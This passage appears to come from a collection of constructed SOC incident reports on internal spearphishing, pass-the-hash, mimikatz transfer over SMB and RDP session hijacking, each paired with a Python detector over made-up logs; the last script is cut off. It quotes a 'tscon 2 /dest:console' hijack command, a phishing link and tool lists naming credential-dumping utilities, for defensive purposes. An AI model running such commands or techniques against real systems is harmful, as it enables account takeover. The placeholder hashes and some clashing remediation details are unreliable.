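indicators the alert lists (send-rate burst, recipients outside the sender's
department, non-corporate originating IP, link domain outside the company's
trusted domains). Log lines, baselines and ranges are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress
import re

# Constructed baseline: typical messages/day and home department per sender.
SENDER_BASELINE = {"jwilson@company.com": {"daily_avg": 8, "dept": "IT"}}
DEFAULT_BASELINE = {"daily_avg": 20, "dept": None}
CORPORATE_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                  ipaddress.ip_network("192.168.0.0/16")]
TRUSTED_LINK_DOMAINS = {"company.com"}          # subdomains are trusted too
WINDOW = timedelta(minutes=15)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def parse_log(text):
    """Parse constructed lines: ts|sender|recipient|recipient_dept|orig_ip|body."""
    events = []
    for line in text.strip().splitlines():
        ts, sender, rcpt, dept, ip, body = line.split("|", 5)
        events.append({"ts": datetime.fromisoformat(ts), "sender": sender,
                       "rcpt": rcpt, "rcpt_dept": dept, "orig_ip": ip, "body": body})
    return events


def peak_window_count(times):
    """Largest number of timestamps falling inside any 15-minute window."""
    times = sorted(times)
    best, lo = 0, 0
    for hi, t in enumerate(times):
        while t - times[lo] > WINDOW:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def is_corporate_ip(ip):
    return any(ipaddress.ip_address(ip) in net for net in CORPORATE_NETS)


def is_trusted_host(host):
    return any(host == d or host.endswith("." + d) for d in TRUSTED_LINK_DOMAINS)


def analyse(events):
    """Return one finding per sender whose traffic matches any indicator."""
    by_sender = defaultdict(list)
    for ev in events:
        by_sender[ev["sender"]].append(ev)
    findings = []
    for sender, evs in by_sender.items():
        base = SENDER_BASELINE.get(sender, DEFAULT_BASELINE)
        reasons = []
        peak = peak_window_count([e["ts"] for e in evs])
        if peak > 2 * base["daily_avg"]:
            reasons.append(f"burst: {peak} messages in 15 min vs {base['daily_avg']}/day baseline")
        if base["dept"]:
            outside = sum(e["rcpt_dept"] != base["dept"] for e in evs)
            if outside > len(evs) / 2:
                reasons.append(f"{outside}/{len(evs)} recipients outside {base['dept']}")
        foreign = sorted({e["orig_ip"] for e in evs if not is_corporate_ip(e["orig_ip"])})
        if foreign:
            reasons.append("non-corporate originating IP: " + ", ".join(foreign))
        links = {h for e in evs for h in URL_RE.findall(e["body"]) if not is_trusted_host(h)}
        if links:
            reasons.append("untrusted link domain: " + ", ".join(sorted(links)))
        if reasons:
            findings.append({"sender": sender, "messages": len(evs), "reasons": reasons})
    return findings


def sample_log():
    """Constructed gateway log: two normal IT messages, one Finance message,
    then the 47-message burst the alert describes (attacker IP from the report)."""
    lines = [
        "2024-02-25T08:05:00|jwilson@company.com|helpdesk@company.com|IT|10.20.30.40|Ticket 4412 closed",
        "2024-02-25T09:10:00|jwilson@company.com|netops@company.com|IT|10.20.30.40|Notes: https://wiki.company.com/netops",
        "2024-02-25T10:20:00|asmith@company.com|bjones@company.com|Finance|10.20.31.9|Q1 numbers attached",
    ]
    start = datetime(2024, 2, 25, 10, 15)
    depts = ["Finance", "HR", "Executive"]
    for i in range(47):
        ts = (start + timedelta(seconds=19 * i)).isoformat(timespec="seconds")
        lines.append(f"{ts}|jwilson@company.com|user{i:02d}@company.com|{depts[i % 3]}"
                     "|185.143.221.89|Verify your credentials: https://company-portal-verify.net")
    return "\n".join(lines)


if __name__ == "__main__":
    for f in analyse(parse_log(sample_log())):
        print(f["sender"], f["messages"], *f["reasons"], sep="\n  ")
```

Each indicator is reported as its own reason rather than collapsed into a single score, so an analyst can see which of the four signals fired; on the constructed log only jwilson is reported, with all four.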
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Proofpoint alert | Proofpoint TAP Console | Confirmed internal spearphishing campaign |
| 2. Account Compromise | Check jwilson account activity | Azure AD Sign-in Logs | Successful login from Bulgaria at 10:00 (no MFA) |
| 3. Immediate Action | Disable jwilson account | Azure AD, Active Directory | Account disabled |
| 4. Email Remediation | Quarantine all sent emails | Proofpoint, Exchange | All 47 emails removed from recipient inboxes |
| 5. Recipient Notification | Alert affected users | Email, Teams | Users warned; no clicks reported (yet) |
| 6. IP Blocking | Block attacker IP | Firewall, Conditional Access | IP 185.143.221[.]89 blocked |
Jira Incident Report
Ticket: SOC-2024-130
Summary: T1534 – Internal Spearphishing via Compromised IT Admin Account
Status: RESOLVED
Resolution: MALICIOUS – Account Secured, Emails Removed
Priority: P1 – CRITICAL
Labels: T1534, internal-spearphishing, account-takeover, proofpoint, phishing
Components: Email-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Proofpoint Email Security.
Alert: “Internal Spearphishing – Compromised Account Sending Malicious Emails”.
Compromised Account: jwilson@company.com (IT Administrator).
Recipients: 47 internal users (Finance, HR, Executive).
Time: 2024-02-25 10:30 EST.
Technique: MITRE ATT&CK T1534 – Internal Spearphishing.
2. Technical Analysis:
Attack Chain:
09:30 – jwilson receives phishing email (external)
09:35 – jwilson clicks link, enters credentials on fake Microsoft login
09:36 – Attacker logs into jwilson account from 185.143.221[.]89
09:45 – Attacker accesses Outlook Web App
10:00 – Attacker crafts phishing email using legitimate account
10:15-10:30 – Attacker sends 47 emails to internal users
10:30 – Proofpoint detects anomaly
10:32 – SOC investigates
Phishing Email Analysis:
From: jwilson@company.com (legitimate, trusted)
Subject: “Urgent: IT Security Update – Action Required”
Link: hxxps://company-portal-verify[.]net
Domain Details: Registered 2024-02-24, hosted on 185.143.221[.]89
Page: Fake company login page (credential harvester)
Attacker Infrastructure:
IP: 185.143.221[.]89 (Bulgaria)
Domain: company-portal-verify[.]net (now blocked)
Impact Assessment:
47 recipients; 12 opened email; 3 clicked link
No credentials entered (users reported suspicious)
No secondary compromise
3. Investigation Findings:
Timeline:
09:30 – jwilson phished
09:36 – Account compromised
10:00-10:30 – Internal phishing sent
10:30 – Proofpoint alert
10:32 – SOC investigates
10:34 – jwilson account disabled
10:35 – Emails quarantined
10:36 – Recipients notified
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
– Malicious Domain: company-portal-verify[.]net
Email:
– From: jwilson@company.com
– Subject: “Urgent: IT Security Update – Action Required”
– Link: hxxps://company-portal-verify[.]net
Account:
– jwilson (compromised, now secured)
4. Containment Actions:
Immediate Actions:
Disabled jwilson account.
Quarantined all 47 emails from recipient mailboxes.
Reset jwilson password.
Enforced MFA.
Blocked attacker IP and domain at firewall and proxy.
Recipient Remediation:
Notified all 47 users.
Checked for credential entry (none).
Educated on internal phishing risks.
Infrastructure Takedown:
Reported domain to registrar (suspended).
5. Root Cause Analysis:
Primary Cause: IT admin account compromised via external phishing.
Contributing Factors:
No MFA on admin account.
User fell for credential harvesting.
Internal emails bypass external filtering (trusted sender).
6. Business Impact:
Operational Impact: IT admin offline for 2 hours.
Data Exposure: None (no secondary compromises).
Reputational Impact: Internal trust potentially affected.
7. Remediation & Prevention:
Completed Actions:
Account secured.
Emails removed.
Recipients notified.
Infrastructure blocked.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented anomaly detection for internal email patterns.
Added banner to internal emails from IT indicating “official IT communications never ask for credentials”.
Enhanced email filtering for internal-originated phishing.
8. Conclusion:
An attacker compromised an IT admin’s account via external phishing and used it to send internal spearphishing emails to 47 employees, leveraging trust in an internal sender. Proofpoint detected the anomalous sending pattern and enabled rapid containment. No secondary compromises occurred.
Closure Rationale: Account secured; emails removed; recipients notified.
Analyst: [Walter White], SOC Analyst Date: 2024-02-25 11:30 EST
Batch 19: Lateral Movement & Collection Incident Reports
91. T1550 – Use Alternate Authentication Material (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-ALTERNATE-AUTH-1550-7842
Alert Time: 2024-02-26 09:30:15 EST
Severity: CRITICAL (98/100)
Source: Microsoft Defender for Identity
Rule: “Pass-the-Hash Attack Detected”
MITRE ATT&CK: T1550.002 – Use Alternate Authentication Material: Pass the Hash
Alert Details:
Detection: NTLM authentication using hash instead of password (Pass-the-Hash)
Source Host: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 192.168.10.10 (DC-01 – Domain Controller)
User: rpatel@company.com
Time: 09:25 EST
Authentication Details:
Protocol: NTLM (not Kerberos)
Authentication Type: NTLMv2
Hash Present: Yes (passed hash, no password)
Session Key: Derived from hash
Target Service: CIFS (file access)
Anomaly Detection:
User rpatel normally uses Kerberos for authentication
NTLM usage unusual for this user in this context
Source host is engineering workstation (not admin)
Multiple previous failed logins from same source
Pattern matches Pass-the-Hash attack
Additional Context:
rpatel’s account had been flagged for suspicious activity
Host 192.168.45.78 was compromised earlier (Cobalt Strike)
Attacker using stolen hash to move laterally
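The Anomaly Detection bullets above reduce to a per-logon score: an NTLM network logon from a user who otherwise authenticates with Kerberos, coming from a host that is not an admin host. The script below is an added example of that scoring over Windows Security event 4624 fields, not MDI's detection logic; it also applies the widely used 4624 heuristic that a passed hash shows up as a network NTLM logon (LogonProcess NtLmSsp) with Key Length 0. The event lines, the admin-host list and the baseline history are constructed.

```python
"""Heuristic Pass-the-Hash detector over Windows Security 4624 logon events.

Added example, not MDI's detection logic. It scores each logon on the
indicators the alert lists (NTLM where the user normally uses Kerberos,
non-admin source host) plus the common 4624 heuristic of a network NTLM
logon with Key Length 0. Events, hosts and baselines are constructed.
"""
from collections import Counter, defaultdict

# Constructed: hosts from which admin NTLM logons are expected (e.g. a jump host).
ADMIN_HOSTS = {"ADMIN-JUMP-01"}
KERBEROS_RATIO_MIN = 0.9     # user counts as "normally Kerberos" at or above this share


def parse_events(text):
    """Parse constructed 'Field=value;Field=value' lines, one 4624 event each."""
    events = []
    for line in text.strip().splitlines():
        ev = dict(kv.split("=", 1) for kv in line.split(";"))
        ev["LogonType"] = int(ev["LogonType"])
        ev["KeyLength"] = int(ev["KeyLength"])
        events.append(ev)
    return events


def kerberos_ratios(history):
    """Share of Kerberos logons per user over the baseline period."""
    by_user = defaultdict(Counter)
    for ev in history:
        by_user[ev["TargetUser"]][ev["AuthPackage"]] += 1
    return {u: c["Kerberos"] / sum(c.values()) for u, c in by_user.items()}


def pth_reasons(ev, ratios):
    """Indicators that this event looks like a passed hash rather than a normal logon."""
    user = ev["TargetUser"]
    if user.endswith("$") or user.upper() == "ANONYMOUS LOGON":
        return []                      # machine and anonymous logons: out of scope
    if not (ev["LogonType"] == 3 and ev["AuthPackage"] == "NTLM"
            and ev["LogonProcess"] == "NtLmSsp"):
        return []                      # only network NTLM logons are candidates
    reasons = ["network NTLM logon (type 3, NtLmSsp)"]
    if ev["KeyLength"] == 0:
        reasons.append("KeyLength 0 (no session key from a password-based logon)")
    if ratios.get(user, 0.0) >= KERBEROS_RATIO_MIN:
        reasons.append(f"{user} normally authenticates with Kerberos")
    if ev["WorkstationName"] not in ADMIN_HOSTS:
        reasons.append(f"source {ev['WorkstationName']} is not an admin host")
    return reasons


def detect(history, new_events, threshold=3):
    """Return logons whose indicator count reaches the threshold."""
    ratios = kerberos_ratios(history)
    hits = []
    for ev in new_events:
        reasons = pth_reasons(ev, ratios)
        if len(reasons) >= threshold:
            hits.append({"time": ev["Time"], "user": ev["TargetUser"], "score": len(reasons),
                         "source": ev["WorkstationName"], "target": ev["Computer"],
                         "reasons": reasons})
    return hits


def sample_history():
    """Constructed baseline: rpatel always Kerberos; svc_backup always NTLM from the jump host."""
    ev = ("Time=2024-02-{d:02d}T08:00:00;Computer=FILE-SRV-02;TargetUser={u};LogonType=3;"
          "AuthPackage={p};LogonProcess={lp};KeyLength={k};WorkstationName={w}")
    rows = [ev.format(d=d, u="rpatel", p="Kerberos", lp="Kerberos", k=0, w="ENG-WS-045")
            for d in range(1, 21)]
    rows += [ev.format(d=d, u="svc_backup", p="NTLM", lp="NtLmSsp", k=128, w="ADMIN-JUMP-01")
             for d in range(1, 21)]
    return "\n".join(rows)


def sample_new_events():
    """Constructed 2024-02-26 logons: the suspect one from the report, plus two benign ones."""
    return "\n".join([
        "Time=2024-02-26T09:25:00;Computer=DC-01;TargetUser=rpatel;LogonType=3;AuthPackage=NTLM;"
        "LogonProcess=NtLmSsp;KeyLength=0;WorkstationName=ENG-WS-045",
        "Time=2024-02-26T09:26:00;Computer=FILE-SRV-02;TargetUser=rpatel;LogonType=3;AuthPackage=Kerberos;"
        "LogonProcess=Kerberos;KeyLength=0;WorkstationName=ENG-WS-045",
        "Time=2024-02-26T09:27:00;Computer=DC-01;TargetUser=svc_backup;LogonType=3;AuthPackage=NTLM;"
        "LogonProcess=NtLmSsp;KeyLength=128;WorkstationName=ADMIN-JUMP-01",
    ])


if __name__ == "__main__":
    for hit in detect(parse_events(sample_history()), parse_events(sample_new_events())):
        print(hit)
```

The baseline ratio matters as much as the event itself: the service account's NTLM logon from the jump host scores only one indicator and stays below the threshold, while the rpatel logon to DC-01 scores all four.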
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify MDI alert | Microsoft Defender for Identity | Confirmed Pass-the-Hash attack |
| 2. Source Investigation | Check ENG-WS-045 | CrowdStrike Falcon | Host has active Cobalt Strike beacon |
| 3. Immediate Action | Isolate source host | CrowdStrike | ENG-WS-045 quarantined |
| 4. Account Remediation | Reset rpatel password | Azure AD, AD | Password reset; force logoff |
| 5. Hash Revocation | Force domain-wide password reset | AD | Not performed domain-wide; reset scoped to the targeted account only |
| 6. Threat Hunting | Check for other Pass-the-Hash activity | MDI, Splunk | No other instances found |
Jira Incident Report
Ticket: SOC-2024-131
Summary: T1550 – Pass-the-Hash Attack from Compromised Engineering Host
Status: RESOLVED
Resolution: MALICIOUS – Lateral Movement Blocked
Priority: P1 – CRITICAL
Labels: T1550, pass-the-hash, alternate-authentication, mdi, lateral-movement
Components: Identity-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Pass-the-Hash Attack Detected”.
Source Host: ENG-WS-045 (Engineering, IP 192.168.45.78).
Target: DC-01 (Domain Controller).
User: rpatel@company.com.
Time: 2024-02-26 09:30 EST.
Technique: MITRE ATT&CK T1550.002 – Use Alternate Authentication Material: Pass the Hash.
2. Technical Analysis:
Attack Chain:
08:00 – rpatel’s credentials compromised via phishing
08:30 – Attacker logs into ENG-WS-045 using compromised credentials
08:45 – Attacker dumps hashes from LSASS memory using Mimikatz
09:00 – Attacker uses rpatel’s hash to authenticate to file server (successful)
09:15 – Attacker uses hash to access other resources
09:25 – Attacker attempts to authenticate to DC-01 using hash
09:25 – MDI detects Pass-the-Hash anomaly
Pass-the-Hash Technique:
Attacker obtained NTLM hash of rpatel’s account
Used hash to authenticate without knowing plaintext password
Bypassed need for password
Allowed lateral movement to file server and attempted DC
Compromised Host:
ENG-WS-045 had active Cobalt Strike beacon
Mimikatz used to extract hashes
Multiple hashes stolen (including rpatel)
Successful Authentications (before detection):
\\filesrv\finance (file server) – accessed 12 files
\\sqlsrv\ (SQL server) – queried (no data extracted)
DC-01 – attempted, blocked by MDI alert
3. Investigation Findings:
Timeline:
08:00 – Credentials compromised
08:30-09:00 – Hash extraction
09:00-09:20 – Lateral movement to file server
09:25 – Pass-the-Hash to DC detected
09:27 – SOC investigates
09:28 – ENG-WS-045 isolated
09:29 – rpatel password reset
Indicators of Compromise (IoCs):
Host:
– ENG-WS-045 (compromised)
Account:
– rpatel (hash stolen, password reset)
Tools:
– Mimikatz (SHA256: a1b2c3d4…)
– Cobalt Strike beacon (SHA256: b2c3d4e5…)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Reset rpatel password.
Forced logoff of all active sessions.
Revoked any active tokens.
Host Remediation:
Full forensic analysis.
Cobalt Strike beacon removed.
Host reimaged.
Data Protection:
Reviewed accessed files on file server (12 files, non-sensitive).
No data exfiltration confirmed.
5. Root Cause Analysis:
Primary Cause: User credentials compromised, leading to hash theft and lateral movement.
Contributing Factors:
No MFA on account.
LSASS accessible (no Credential Guard).
Network segmentation insufficient.
6. Business Impact:
Operational Impact: Engineering host offline for reimage; user offline for password reset.
Security Impact: Lateral movement achieved; DC access prevented.
7. Remediation & Prevention:
Completed Actions:
Host isolated and cleaned.
Password reset.
Hashes invalidated.
Technical Controls Enhanced:
Enabled Credential Guard on all endpoints.
Restricted lateral movement via network segmentation.
Enhanced MDI monitoring for Pass-the-Hash.
8. Conclusion:
An attacker used compromised credentials to dump hashes and perform Pass-the-Hash attacks, moving laterally to a file server and attempting domain controller access. MDI detected the anomalous authentication and enabled rapid containment.
Closure Rationale: Lateral movement blocked; host cleaned; account secured.
Analyst: [Walter White], SOC Analyst Date: 2024-02-26 10:30 EST
92. T1570 – Lateral Tool Transfer (ExtraHop Detection)
ExtraHop Alert Details
Alert ID: EXTRAHOP-TOOL-TRANSFER-1570-7842
Alert Time: 2024-02-26 14:15:33 EST
Severity: HIGH (85/100)
Source: ExtraHop Reveal(x)
Rule: “Large File Transfer over SMB – Potential Tool Transfer”
MITRE ATT&CK: T1570 – Lateral Tool Transfer
Alert Details:
Detection: Large executable file transferred over SMB between internal hosts
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 192.168.45.112 (SALES-WS-023 – Sales)
Protocol: SMB (TCP/445)
File: \\ENG-WS-045\C$\Tools\mimikatz.exe
File Size: 1.2 MB
Time: 14:10-14:15 EST
Transfer Details:
File: mimikatz.exe (SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4)
Source Share: ADMIN$ (admin share)
Destination: C:\Users\Public\Downloads\mimikatz.exe
Transfer Time: 14:10:22 – 14:10:45 (23 seconds)
Additional Context:
Source host (ENG-WS-045) was previously compromised
Destination host (SALES-WS-023) is a sales workstation
Transfer of hacking tool (mimikatz) indicates lateral movement preparation
Both hosts now potentially compromised
Detection Logic:
Large executable transferred over SMB (unusual for sales workflow)
File name “mimikatz.exe” (known credential dumping tool)
Source host has history of suspicious activity
Destination host has no legitimate need for such tool
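The Detection Logic above combines four facts about one SMB write: the share, the roles of the two endpoints, what the file is, and whether the source host is already suspect. The script below is an added example that scores SMB write records on those facts; it is not ExtraHop's logic. It goes one step beyond the report by checking the PE "MZ" header of the written bytes, so a tool copied under a harmless name is still caught. The asset inventory, watchlist, file records and the second hash are constructed; the mimikatz hash is the truncated value the report gives.

```python
"""Lateral tool-transfer detector over constructed SMB file-write records.

Added example, not ExtraHop's logic. Scores each SMB write on: admin share
destination, workstation-to-workstation direction, PE header in the payload,
size, known tool name or hash, and a watchlisted source host. Inventory,
watchlist, records and the second hash are constructed; the mimikatz hash is
the report's truncated value.
"""

# Constructed asset inventory: ip -> (hostname, role)
INVENTORY = {
    "192.168.45.78": ("ENG-WS-045", "workstation"),
    "192.168.45.112": ("SALES-WS-023", "workstation"),
    "192.168.45.130": ("SALES-WS-031", "workstation"),
    "192.168.10.20": ("FILE-SRV-02", "server"),
}
WATCHLIST = {"ENG-WS-045"}                       # hosts with prior suspicious activity
KNOWN_TOOL_NAMES = {"mimikatz.exe", "procdump.exe", "psexec.exe"}
KNOWN_TOOL_HASHES = {"a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4"}
LARGE_BYTES = 1_000_000


def parse_records(text):
    """Constructed lines: ts|src_ip|dst_ip|share|path|size|first_bytes_hex|sha256."""
    recs = []
    for line in text.strip().splitlines():
        ts, src, dst, share, path, size, head, sha = line.split("|")
        recs.append({"ts": ts, "src": src, "dst": dst, "share": share, "path": path,
                     "size": int(size), "head": head.lower(), "sha256": sha})
    return recs


def is_admin_share(share):
    return share.upper() in {"C$", "ADMIN$", "IPC$"} or share.endswith("$")


def transfer_reasons(rec):
    """Indicators that this SMB write is a tool being staged on another host."""
    src_name, src_role = INVENTORY.get(rec["src"], (rec["src"], "unknown"))
    dst_name, dst_role = INVENTORY.get(rec["dst"], (rec["dst"], "unknown"))
    fname = rec["path"].replace("/", "\\").split("\\")[-1].lower()
    reasons = []
    if is_admin_share(rec["share"]):
        reasons.append(f"write to admin share {rec['share']} on {dst_name}")
    if src_role == "workstation" and dst_role == "workstation":
        reasons.append(f"workstation-to-workstation SMB write ({src_name} -> {dst_name})")
    if rec["head"].startswith("4d5a"):             # 'MZ': a PE file whatever its extension
        reasons.append("payload is a PE executable (MZ header)" +
                       ("" if fname.endswith((".exe", ".dll")) else f", disguised as {fname}"))
    if rec["size"] >= LARGE_BYTES:
        reasons.append(f"large file ({rec['size']} bytes)")
    if fname in KNOWN_TOOL_NAMES or rec["sha256"] in KNOWN_TOOL_HASHES:
        reasons.append(f"known offensive tool: {fname}")
    if src_name in WATCHLIST:
        reasons.append(f"source {src_name} on watchlist")
    return reasons


def detect(records, threshold=3):
    hits = []
    for rec in records:
        reasons = transfer_reasons(rec)
        if len(reasons) >= threshold:
            hits.append({"ts": rec["ts"], "path": rec["path"], "score": len(reasons),
                         "reasons": reasons})
    return hits


def sample_records():
    """Constructed: the reported mimikatz copy, a benign document save to the file
    server, and a renamed PE written to another sales workstation's ADMIN$ share."""
    return "\n".join([
        "2024-02-26T14:10:22|192.168.45.78|192.168.45.112|C$|Users\\Public\\Downloads\\mimikatz.exe"
        "|1258291|4d5a9000|a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4",
        "2024-02-26T14:11:05|192.168.45.130|192.168.10.20|finance|reports\\q1.docx"
        "|184320|504b0304|0000000000000000000000000000000000000000000000000000000000000001",
        "2024-02-26T14:12:40|192.168.45.78|192.168.45.130|ADMIN$|Temp\\report.dat"
        "|1203200|4d5a9000|0000000000000000000000000000000000000000000000000000000000000002",
    ])


if __name__ == "__main__":
    for hit in detect(parse_records(sample_records())):
        print(hit["ts"], hit["path"], hit["score"], *hit["reasons"], sep="\n  ")
```

A file-name match alone is brittle (the tool only has to be renamed), which is why the PE header, the admin-share destination and the workstation-to-workstation direction carry the score here; the renamed `report.dat` in the constructed data is flagged without any name or hash match.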
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify ExtraHop alert | ExtraHop Console | Confirmed mimikatz transfer |
| 2. Source Investigation | Check ENG-WS-045 | CrowdStrike Falcon | Host has active Cobalt Strike beacon |
| 3. Destination Investigation | Check SALES-WS-023 | CrowdStrike Falcon | mimikatz.exe present; no execution yet |
| 4. Immediate Action | Isolate both hosts | CrowdStrike | Both hosts quarantined |
| 5. File Removal | Delete mimikatz.exe from destination | CrowdStrike Live Response | File deleted |
| 6. Threat Hunting | Check for other tool transfers | ExtraHop, Splunk | No other transfers found |
Jira Incident Report
Ticket: SOC-2024-132
Summary: T1570 – Lateral Tool Transfer (Mimikatz) from Compromised Engineering Host
Status: RESOLVED
Resolution: MALICIOUS – Transfer Blocked, Tools Removed
Priority: P2 – MEDIUM
Labels: T1570, lateral-tool-transfer, mimikatz, extrahop, lateral-movement
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: ExtraHop Reveal(x).
Alert: “Large File Transfer over SMB – Potential Tool Transfer”.
Source: 192.168.45.78 (ENG-WS-045 – Engineering, compromised).
Destination: 192.168.45.112 (SALES-WS-023 – Sales).
File: mimikatz.exe (1.2 MB).
Time: 2024-02-26 14:15 EST.
Technique: MITRE ATT&CK T1570 – Lateral Tool Transfer.
2. Technical Analysis:
Attack Chain:
13:00 – ENG-WS-045 compromised (Cobalt Strike)
13:30 – Attacker downloads mimikatz to engineering host
14:10 – Attacker transfers mimikatz to sales workstation via SMB
14:10-14:15 – Transfer completed
14:15 – ExtraHop detects
Transfer Details:
File: mimikatz.exe (SHA256: a1b2c3d4…)
Source: \\ENG-WS-045\C$\Tools\mimikatz.exe (admin share)
Destination: C:\Users\Public\Downloads\mimikatz.exe
Method: Attacker used compromised engineering host credentials to access admin share on destination
Destination Host Status:
SALES-WS-023 not yet compromised (no execution)
mimikatz present but not run
User mwilson unaware
Attacker Intent:
Stage tools on multiple hosts for further lateral movement
Prepare for credential dumping on sales workstations
Potential for ransomware deployment
3. Investigation Findings:
Timeline:
13:00 – ENG-WS-045 compromised
14:10 – Tool transfer
14:15 – ExtraHop alert
14:17 – SOC investigates
14:18 – Both hosts isolated
14:20 – mimikatz deleted from destination
Indicators of Compromise (IoCs):
Files:
– mimikatz.exe (SHA256: a1b2c3d4…)
Hosts:
– ENG-WS-045 (compromised)
– SALES-WS-023 (tool present)
Network:
– SMB transfer from 192.168.45.78 to 192.168.45.112
4. Containment Actions:
Immediate Actions:
Isolated both hosts via CrowdStrike.
Deleted mimikatz.exe from sales workstation.
Scanned destination for other tools (none).
Source Remediation:
ENG-WS-045 reimaged (from previous incident).
Full cleanup.
Destination Remediation:
Full scan (clean).
Password reset for user mwilson (precaution).
5. Root Cause Analysis:
Primary Cause: Compromised engineering host used to transfer tools laterally.
Contributing Factors:
Admin shares accessible (C$, ADMIN$) over network.
No network segmentation between departments.
No application control blocking unknown executables.
6. Business Impact:
Operational Impact: Two workstations offline for 2 hours.
Security Impact: Tool staged but not executed; no compromise of destination.
7. Remediation & Prevention:
Completed Actions:
Tools removed.
Hosts cleaned.
Lateral movement blocked.
Technical Controls Enhanced:
Disabled admin shares where not needed.
Implemented network segmentation between departments.
Enhanced monitoring for large file transfers.
8. Conclusion:
An attacker transferred mimikatz from a compromised engineering host to a sales workstation, staging tools for further lateral movement. ExtraHop detected the large file transfer, enabling isolation and removal before the tool could be executed.
Closure Rationale: Tool removed; lateral movement blocked; hosts secured.
Analyst: [Walter White], SOC Analyst Date: 2024-02-26 15:30 EST
93. T1563 – Remote Service Session Hijacking (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-RDP-HIJACK-1563-7842
Alert Time: 2024-02-26 11:30:22 EST
Severity: HIGH (88/100)
Source: Microsoft Defender for Endpoint
Rule: “RDP Session Hijacking Attempt Detected”
MITRE ATT&CK: T1563.002 – Remote Service Session Hijacking: RDP Hijacking
Alert Details:
Detection: Attempt to hijack existing RDP session via tscon.exe
Host: IT-WS-034 (IT Workstation)
User: bjones (Brian Jones, IT Admin)
Time: 11:25 EST
Process Tree:
```text
explorer.exe (PID: 2341)
└─ cmd.exe (PID: 4789)
   └─ tscon.exe (PID: 4792)
      Command: tscon 2 /dest:console
```
Target Session: 2 (active RDP session of another user)
Additional Context:
Session 2 belongs to user msmith (IT Admin) connected remotely
tscon.exe used to switch to another session
Requires SYSTEM privileges or SeTcbPrivilege
Attacker attempting to hijack active admin session
Detection Logic:
tscon.exe executed by non-SYSTEM process (cmd.exe as bjones)
Target session belongs to another user
Command used for session hijacking
User bjones should not have privilege to switch sessions
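The Detection Logic above needs two data sources joined: the process-creation event for tscon.exe (who ran it, from what parent, with what arguments) and the session table that says who owns the target session. The script below is an added example of that join, not Defender's logic: it parses a constructed `quser` listing into a session map and scores constructed process-creation events (Sysmon Event ID 1 style fields) for a non-SYSTEM user switching into another user's session. Hostnames, users, the session table and the events are all constructed.

```python
"""Detector for cross-user session switching with tscon.exe.

Added example, not Defender's logic. Joins constructed process-creation
events with a constructed quser listing and flags tscon.exe runs where the
invoking user is not SYSTEM and the target session belongs to someone else.
"""
import re

TSCON_RE = re.compile(r"tscon(?:\.exe)?\s+(\S+)\s+/dest:(\S+)", re.IGNORECASE)
SYSTEM_USERS = {"NT AUTHORITY\\SYSTEM"}


def parse_quser(text):
    """Parse quser output into {session_id: username}. Handles the missing
    SESSIONNAME column of disconnected sessions and the '>' current-session marker."""
    sessions = {}
    for line in text.splitlines()[1:]:          # skip the header row
        tokens = line.split()
        if not tokens:
            continue
        user = tokens[0].lstrip(">")
        sid = next(t for t in tokens[1:] if t.isdigit())   # first numeric token is the ID
        sessions[int(sid)] = user
    return sessions


def parse_events(text):
    """Constructed 'Field=value;...' process-creation lines."""
    return [dict(kv.split("=", 1) for kv in line.split(";"))
            for line in text.strip().splitlines()]


def hijack_reasons(ev, sessions):
    """Indicators that this process event is a cross-user session switch."""
    image = ev["Image"].replace("/", "\\").split("\\")[-1].lower()
    if image != "tscon.exe":
        return []
    parent = ev["ParentImage"].split("\\")[-1]
    reasons = [f"tscon.exe launched by {ev['User']} from {parent}"]
    if ev["User"] not in SYSTEM_USERS:
        reasons.append("not running as SYSTEM (would need SeTcbPrivilege)")
    m = TSCON_RE.search(ev["CommandLine"])
    if not m:
        return reasons
    target, dest = m.group(1), m.group(2)
    invoker = ev["User"].split("\\")[-1].lower()
    owner = sessions.get(int(target)) if target.isdigit() else None
    if owner is not None and owner.lower() != invoker:
        reasons.append(f"target session {target} belongs to {owner}, not {invoker}")
    if dest.lower() == "console":
        reasons.append("destination is the console session")
    return reasons


def detect(events, sessions, threshold=3):
    hits = []
    for ev in events:
        reasons = hijack_reasons(ev, sessions)
        if len(reasons) >= threshold:
            hits.append({"time": ev["Time"], "user": ev["User"],
                         "cmd": ev["CommandLine"], "reasons": reasons})
    return hits


# Constructed quser output for the host in the report (third session added for the parser).
SAMPLE_QUSER = """ USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 bjones                rdp-tcp#1           1  Active          .  2/26/2024 10:45 AM
 msmith                rdp-tcp#2           2  Active       1:12  2/26/2024 9:30 AM
 jdoe                                      3  Disc        23:05  2/25/2024 5:10 PM
"""

# Constructed events: the reported attempt, a SYSTEM-initiated switch, an unrelated cmd.exe.
SAMPLE_EVENTS = "\n".join([
    "Time=2024-02-26T11:25:03;Image=C:\\Windows\\System32\\tscon.exe;CommandLine=tscon 2 /dest:console;"
    "User=COMPANY\\bjones;ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Time=2024-02-26T11:25:10;Image=C:\\Windows\\System32\\tscon.exe;CommandLine=tscon 1 /dest:rdp-tcp#1;"
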